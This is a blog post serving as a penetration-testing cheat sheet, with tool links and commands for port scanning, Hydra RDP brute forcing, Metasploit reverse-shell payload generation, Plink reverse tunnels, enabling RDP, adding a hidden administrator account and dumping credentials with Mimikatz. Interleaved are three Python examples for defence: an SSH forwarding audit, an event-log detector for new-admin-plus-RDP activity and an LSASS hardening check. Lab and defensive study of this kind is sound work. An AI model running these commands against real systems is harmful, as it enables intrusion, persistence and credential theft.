I personally need quick access to a few commands and some links while working on penetration testing exercises, so I decided to post the information below on this blog :)
General Links:
- Enumeration
- Online Hash Cracking
- Dump Windows Password Hashes
- Nikto Basics
- SQLmap Tool
- Reverse Shell Cheat Sheets
- One Liner Shells
- SQL Character Encoder
- Unicorn Scanner
Privilege Escalation Links:
- http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
- http://pentestmonkey.net/tools/audit/unix-privesc-check
- http://www.madleets.com/Thread-Local-Root-Collection
- http://www.rebootuser.com/?p=1758
Tunneling & Port Forwarding:
- http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html (Very Good)
- http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
- http://www.danscourses.com/Network-Penetration-Testing/metasploit-pivoting.html
- http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
- http://www.offensive-security.com/metasploit-unleashed/Portfwd
- http://www.offensive-security.com/metasploit-unleashed/Pivoting
- http://www.howtoforge.com/reverse-ssh-tunneling
- http://ftp.acc.umu.se/pub/putty/putty-0.57/htmldoc/Chapter7.html (Plink)
- http://www.offensive-security.com/metasploit-unleashed/Msfvenom
Handy Commands:
Scan all ports (:a) at a rate of 10000 packets per second (-r10000):
unicornscan X.X.X.X:a -r10000 -v
Python:
python -c 'import pty;pty.spawn("/bin/bash")' (upgrade a limited shell to a TTY-backed bash)
python -m SimpleHTTPServer (start an HTTP server on port 8000 serving the current directory; Python 2. On Python 3 the equivalent is: python3 -m http.server)
Hydra:
hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (single user admin, password list from file, -S for SSL, rdp service)
Mount Remote Windows Share:
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
Metasploit Payloads (X = executable output, R = raw output; msfpayload and msfencode are deprecated, msfvenom replaces both):
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b "\x00" -t c
Plink Tunnel:
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 X.X.X.X
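The -L/-R syntax behind the Plink line and the tunneling links above is easy to read backwards (which end opens the listener, which end makes the onward connection). As an added example that is not part of the original post, the script below decodes a forward spec into plain language and audits an sshd_config snippet for the directives that permit remote forwards (AllowTcpForwarding, GatewayPorts). The sample config is constructed; the function and variable names are my own.

```python
"""Added example (not part of the original post): decode the SSH/Plink port-
forward syntax used in the Plink line above and audit sshd_config for the
directives that permit such forwards. The sample config below is constructed."""
import re
from dataclasses import dataclass


@dataclass
class Forward:
    kind: str        # "local" for -L, "remote" for -R
    bind_addr: str   # interface the listener binds to
    bind_port: int   # port the listener opens
    dest_host: str   # where accepted connections are delivered
    dest_port: int


def parse_forward(flag: str, spec: str) -> Forward:
    """Parse '[bind_address:]port:host:hostport' as accepted by ssh -L/-R and plink."""
    parts = spec.split(":")
    if len(parts) == 3:
        bind_addr = "127.0.0.1"          # both ssh and plink default to loopback
        port, host, hostport = parts
    elif len(parts) == 4:
        bind_addr, port, host, hostport = parts
        bind_addr = bind_addr or "*"     # ':445:...' means all interfaces
    else:
        raise ValueError(f"unrecognised forward spec: {spec!r}")
    return Forward({"-L": "local", "-R": "remote"}[flag], bind_addr, int(port), host, int(hostport))


def describe(fwd: Forward) -> str:
    """Plain-language reading: which end opens the listener and which end connects onward."""
    if fwd.kind == "local":
        listener, egress = "ssh client", "ssh server"
    else:                                 # -R: the SSH *server* opens the listener
        listener, egress = "ssh server", "ssh client"
    return (f"{listener} listens on {fwd.bind_addr}:{fwd.bind_port}; "
            f"{egress} delivers each connection to {fwd.dest_host}:{fwd.dest_port}")


# OpenSSH defaults; sshd honours the first occurrence of a keyword
DEFAULTS = {"AllowTcpForwarding": "yes", "GatewayPorts": "no"}


def audit_sshd_config(text: str) -> dict:
    """Return the effective forwarding directives and findings for an sshd_config snippet."""
    settings = dict(DEFAULTS)
    seen = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        m = re.match(r"(\w+)\s+(\S+)", line)
        if not m:
            continue
        for key in DEFAULTS:
            if m.group(1).lower() == key.lower() and key not in seen:
                settings[key] = m.group(2)
                seen.add(key)
    findings = []
    if settings["AllowTcpForwarding"].lower() in ("yes", "all", "remote"):
        findings.append(f"remote (-R) forwards permitted: AllowTcpForwarding {settings['AllowTcpForwarding']}")
    if settings["GatewayPorts"].lower() != "no":
        findings.append(f"remote listeners may bind non-loopback interfaces: GatewayPorts {settings['GatewayPorts']}")
    return {"settings": settings, "findings": findings}


SAMPLE_SSHD_CONFIG = """\
# constructed sample, not taken from any real host
Port 22
AllowTcpForwarding yes
GatewayPorts no
AllowTcpForwarding no   # ignored: sshd keeps the first occurrence
"""

if __name__ == "__main__":
    fwd = parse_forward("-R", "445:127.0.0.1:445")   # the Plink line above
    print(describe(fwd))
    for finding in audit_sshd_config(SAMPLE_SSHD_CONFIG)["findings"]:
        print("finding:", finding)
```

Run on the Plink spec it prints that the SSH server, not the client, ends up listening on 127.0.0.1:445, which is the detail that makes the reverse tunnel work and the reason a server that does not need it should set AllowTcpForwarding no (or local).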
Enable RDP Access (fDenyTSConnections=0 allows Terminal Services connections; the netsh lines open the built-in firewall for it):
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Nmap WebDAV Scanning:
nmap -p80,8080 --script=http-iis-webdav-vuln X.X.X.X
Meterpreter:
run getgui -u admin -p 1234
run vnc -p 5043
Add User Windows:
net user test 1234 /add
net localgroup administrators test /add
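From the blue-team side, the "Enable RDP Access" and "Add User Windows" commands above leave a recognisable trail in the Security log: 4720 (user account created), 4732 (member added to a security-enabled local group) and, with registry auditing on, 4657 (registry value modified). As an added example that is not part of the original post, the detector below correlates those three within a time window. The line layout "timestamp|EventID|key=value|..." and the log contents are constructed for the demo; only the event IDs and field names are the real ones.

```python
"""Added example (not part of the original post): flag the create-user,
add-to-Administrators, enable-RDP sequence in constructed Windows Security
log lines. Event IDs 4720/4732/4657 are real; the pipe-delimited format and
the sample records are made up for this demo."""
from datetime import datetime, timedelta

# Constructed sample log, not from any real host. Raw string keeps the backslashes.
SAMPLE_LOG = r"""
2014-03-02T22:14:05|4720|TargetUserName=test|SubjectUserName=Administrator
2014-03-02T22:14:09|4732|TargetUserName=Administrators|MemberName=WIN-SRV\test|SubjectUserName=Administrator
2014-03-02T22:14:30|4657|ObjectName=\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Terminal Server|ObjectValueName=fDenyTSConnections|NewValue=0
2014-03-02T23:40:00|4720|TargetUserName=svc_backup|SubjectUserName=Administrator
"""

WINDOW = timedelta(minutes=30)   # how close together the steps must be to correlate


def parse_line(line: str) -> dict:
    """'timestamp|EventID|k=v|k=v' -> dict with parsed time and integer event_id."""
    ts, event_id, *fields = line.split("|")
    rec = {"time": datetime.fromisoformat(ts), "event_id": int(event_id)}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def parse_log(text: str) -> list:
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def detect_new_admin_with_rdp(records: list) -> list:
    """One alert per account that was created (4720) and then added to the
    Administrators group (4732) within WINDOW; the alert also records whether
    fDenyTSConnections was set to 0 (4657) in the same window."""
    alerts = []
    for created in (r for r in records if r["event_id"] == 4720):
        user = created["TargetUserName"]
        start, deadline = created["time"], created["time"] + WINDOW
        admin_add = next((r for r in records
                          if r["event_id"] == 4732
                          and r.get("TargetUserName", "").lower() == "administrators"
                          # MemberName is DOMAIN\user; compare the user part only
                          and r.get("MemberName", "").split("\\")[-1].lower() == user.lower()
                          and start <= r["time"] <= deadline), None)
        if admin_add is None:
            continue   # a plain account creation on its own is not alerted here
        rdp_enabled = any(r["event_id"] == 4657
                          and r.get("ObjectValueName") == "fDenyTSConnections"
                          and r.get("NewValue") == "0"
                          and start <= r["time"] <= deadline
                          for r in records)
        alerts.append({"user": user, "created_by": created.get("SubjectUserName"),
                       "created_at": start, "admin_at": admin_add["time"],
                       "rdp_enabled": rdp_enabled})
    return alerts


if __name__ == "__main__":
    for alert in detect_new_admin_with_rdp(parse_log(SAMPLE_LOG)):
        print(alert)
```

Two caveats when moving this to real data: 4657 only appears if "Audit Registry" is enabled and the Terminal Server key carries a SACL, and real 4732 events carry the group as a SID (S-1-5-32-544 for Administrators) alongside the name, so match on either.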
Mimikatz:
privilege::debug
sekurlsa::logonPasswords full
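sekurlsa::logonPasswords works because LSASS holds credential material that any holder of SeDebugPrivilege (which privilege::debug requests) can read. As an added example that is not part of the original post, the check below audits the documented mitigations: RunAsPPL (LSA protection), WDigest UseLogonCredential, LsaCfgFlags (Credential Guard) and who holds SeDebugPrivilege in a secedit-style export. The registry snapshot and the [Privilege Rights] text are constructed; the key paths and value meanings are the documented Windows ones.

```python
"""Added example (not part of the original post): hardening check for the
LSASS credential exposure that sekurlsa::logonPasswords depends on. Registry
snapshot and secedit text below are constructed for the demo."""
import re

LSA = r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa"
WDIGEST = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
ADMINS_SID = "S-1-5-32-544"   # BUILTIN\Administrators

# Constructed snapshot: (key, value name) -> data; None means the value is absent.
SAMPLE_REGISTRY = {
    (LSA, "RunAsPPL"): None,             # absent: LSASS is not a protected process
    (WDIGEST, "UseLogonCredential"): 1,  # WDigest keeps cleartext passwords in LSASS
    (LSA, "LsaCfgFlags"): None,          # absent: Credential Guard not configured
}
HARDENED_REGISTRY = {
    (LSA, "RunAsPPL"): 1,
    (WDIGEST, "UseLogonCredential"): 0,
    (LSA, "LsaCfgFlags"): 1,
}

# Constructed secedit /export style text (the real export uses this section layout).
SAMPLE_PRIVILEGE_RIGHTS = """\
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544
SeRemoteInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-555
"""
HARDENED_PRIVILEGE_RIGHTS = "[Privilege Rights]\nSeDebugPrivilege =\n"


def debug_privilege_holders(inf_text: str) -> list:
    """SIDs (or names) granted SeDebugPrivilege in a secedit export; '*' prefixes mark SIDs."""
    for line in inf_text.splitlines():
        m = re.match(r"\s*SeDebugPrivilege\s*=\s*(.*)", line)
        if m:
            return [x.strip().lstrip("*") for x in m.group(1).split(",") if x.strip()]
    return []


def audit_lsass_protection(registry: dict, inf_text: str) -> list:
    """Return findings; an empty list means every checked mitigation is in place."""
    findings = []
    # 1 = LSA protection on (UEFI lock); 2 = on without UEFI lock on newer builds
    if registry.get((LSA, "RunAsPPL")) not in (1, 2):
        findings.append("RunAsPPL not set: LSASS is not running as a protected process")
    if registry.get((WDIGEST, "UseLogonCredential")) == 1:
        findings.append("WDigest UseLogonCredential=1: cleartext passwords cached in LSASS")
    # 1 = Credential Guard with UEFI lock, 2 = without UEFI lock
    if registry.get((LSA, "LsaCfgFlags")) not in (1, 2):
        findings.append("LsaCfgFlags not 1/2: Credential Guard not enabled")
    if ADMINS_SID in debug_privilege_holders(inf_text):
        findings.append("SeDebugPrivilege granted to BUILTIN\\Administrators: "
                        "privilege::debug succeeds for any local admin")
    return findings


if __name__ == "__main__":
    for f in audit_lsass_protection(SAMPLE_REGISTRY, SAMPLE_PRIVILEGE_RIGHTS):
        print("finding:", f)
    print("hardened host findings:", audit_lsass_protection(HARDENED_REGISTRY, HARDENED_PRIVILEGE_RIGHTS))
```

On a live host you would populate the dictionary from `reg query` output and the rights text from `secedit /export /cfg`; the absent-value case matters because on Windows 7 / 2008 R2 with KB2871997 installed, WDigest still caches unless UseLogonCredential is explicitly 0.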
Compiling Windows Exploits on Backtrack:
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
Nasm Command:
nasm -f bin -o payload.bin payload.asm
To Be Continued....
Hope it's helpful to all of you!
Comments:
My last night in the lab tonight!!! Great post!!! Wish you had posted this a long time ago!! hehe
hehe.. thanks buddy.. I will share more info soon..!
Thanks for sharing. Learned a lot from your blog. I have read your blog about penetration testing; it is very helpful. I really enjoyed reading it; you may be a great author. I must say you've done a wonderful job by sharing your article with us. External penetration testing